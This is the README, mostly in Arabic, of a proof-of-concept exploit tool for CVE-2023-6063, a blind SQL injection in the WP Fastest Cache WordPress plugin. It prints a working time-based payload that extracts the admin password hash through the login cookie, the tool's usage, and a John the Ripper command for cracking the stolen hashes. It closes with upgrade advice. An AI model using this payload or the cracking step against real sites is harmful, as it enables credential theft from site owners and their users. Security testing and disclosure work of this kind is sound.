
إثبات مفهوم بلغة Python للثغرة CVE-2023-6063، وهي حقن SQL أعمى قائم على الوقت وغير مُصادَق عليه في WP Fastest Cache <=1.2.2، يستخرج تجزئات كلمات مرور WordPress والبريد الإلكتروني.
إثبات مفهوم (PoC) لـ CVE-2023-6063، وهي ثغرة حقن SQL عمياء معتمدة على الوقت وغير مصادَق عليها، تؤثر على WP Fastest Cache ≤ 1.2.2.
يمكن تفعيل الثغرة من خلال ملف تعريف الارتباط wordpress_logged_in وقد تسمح للمهاجم باستنتاج معلومات حساسة من قاعدة بيانات WordPress، بما في ذلك تجزئات كلمات المرور وعناوين البريد الإلكتروني.
لأغراض اختبار الأمان المصرّح به والأغراض التعليمية فقط.
اختبار حقن SQL العمياء المعتمدة على الوقت.
استخراج البيانات حرفًا بحرف باستخدام تأخيرات SLEEP() في SQL.
استهداف اسم مستخدم WordPress محدد.
التحقق الاختياري من تجزئة كلمة المرور.
استخراج البريد الإلكتروني الاختياري.
دعم ملفات تعريف الارتباط المخصصة.
تأخير استجابة قابل للتكوين.
وضع التصحيح لاستكشاف الأخطاء وإصلاحها.
الاستخراج الانتقائي باستخدام:
--just-hash--just-emailاعتمادًا على تكوين الهدف ومحتويات قاعدة البيانات، يمكن لـ PoC استخراج:
wp_users.user_pass.wp_users.user_email.قم بتثبيت تبعيات Python المطلوبة:
pip install -r requirements.txt
python3 poc.py -u https://vulnerable-website.example --username admin --delay 5
استبدل عنوان URL المثال بنظام مصرّح لك صراحةً باختباره.
-h, --help
Show the help message and exit.
-u URL, --url URL
Full URL of the WordPress installation to test.
--username USERNAME
Specify the WordPress username whose information should be tested.
-d DELAY, --delay DELAY
Response delay used for time-based testing.
Default: 5 seconds.
Minimum: 2 seconds.
-H HASH, --hash HASH
Hash to verify against the wp_users table.
If the hash contains special characters, wrap it in single quotes.
--domain DOMAIN
Domain used for email validation.
-c COOKIE, --cookie COOKIE
Specify a custom cookie name if the target uses a different context.
--status-code STATUS_CODE
Specify the expected positive HTTP status code.
Default: 200.
--debug
Enable additional debugging output.
--just-hash
Extract only the password hash.
--just-email
Extract only the email address.
تؤثر CVE-2023-6063 على إصدارات WP Fastest Cache ≤ 1.2.2.
الثغرة هي حقن SQL أعمى غير مصادَق عليه يمكن تفعيله من خلال ملف تعريف الارتباط wordpress_logged_in.
يمكن استغلال المشكلة لإجراء استنتاج معتمد على الوقت ضد قاعدة بيانات WordPress. من خلال قياس الاختلافات في أوقات استجابة HTTP، يمكن استنتاج الأحرف الفردية لقيم قاعدة البيانات دون تلقي البيانات المستعلم عنها مباشرةً في استجابة HTTP.
مثال مبسّط للتقنية الأساسية هو:
" AND (IF(
(SELECT user_pass
FROM wp_users
WHERE user_login="admin") LIKE 'a%',
SLEEP(5),
0
))-- -
إذا تم تقييم الشرط المختبر على أنه صحيح، فإن قاعدة البيانات تُدخل تأخيرًا. تكرار هذه العملية بأحرف مختلفة يسمح باستنتاج المعلومات حرفًا بحرف.
| Security Property | Impact |
|---|---|
| Confidentiality | High |
| Integrity | None |
| Availability | None |
تشمل المعلومات المعرّضة للكشف المحتمل تجزئات كلمات مرور مستخدمي WordPress وعناوين البريد الإلكتروني.
يوضح العرض التوضيحي التالي استخدام PoC ضد بيئة اختبار مصرّح بها:
عند الحصول على تجزئة كلمة مرور WordPress بشكل مشروع أثناء تقييم أمني مصرّح به، يمكن استخدام أدوات تدقيق كلمات المرور مثل John the Ripper أو Hashcat لتقييم قوة كلمة المرور.
على سبيل المثال، مع John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
قم بإجراء تدقيق كلمات المرور فقط ضد التجزئات المصرّح لك بحيازتها واختبارها.
WP Fastest Cache:
≤ 1.2.2
التخفيف الموصى به هو ترقية WP Fastest Cache إلى إصدار يحتوي على الإصلاح الأمني.
تشمل التدابير الدفاعية الإضافية:
موصى به: ترقية WP Fastest Cache إلى 1.2.3 أو أحدث.
يُقدَّم هذا المشروع للأغراض التعليمية والبحث الأمني المصرّح به فقط.
لا تستخدم هذا PoC ضد الأنظمة أو المواقع الإلكترونية أو التطبيقات أو البنية التحتية دون إذن صريح من المالك.
المؤلف غير مسؤول عن سوء الاستخدام أو الضرر أو فقدان البيانات أو الوصول غير المصرّح به أو أي عواقب أخرى ناتجة عن استخدام هذا البرنامج.
اختبر فقط الأنظمة التي تملكها أو لديك تصريح صريح بتقييمها.
يُصدر هذا المشروع بموجب رخصة GNU العامة العمومية الإصدار 3.0 (GPLv3).
| Property | Details |
|---|
| CVE | CVE-2023-6063 |
| CVSS | 7.5 — High |
| Vulnerability | Blind SQL Injection |
| Injection Type | Time-Based |
| Authentication | Not required |
| Affected Software | WP Fastest Cache |
| Affected Versions | ≤ 1.2.2 |
| Attack Vector | Remote |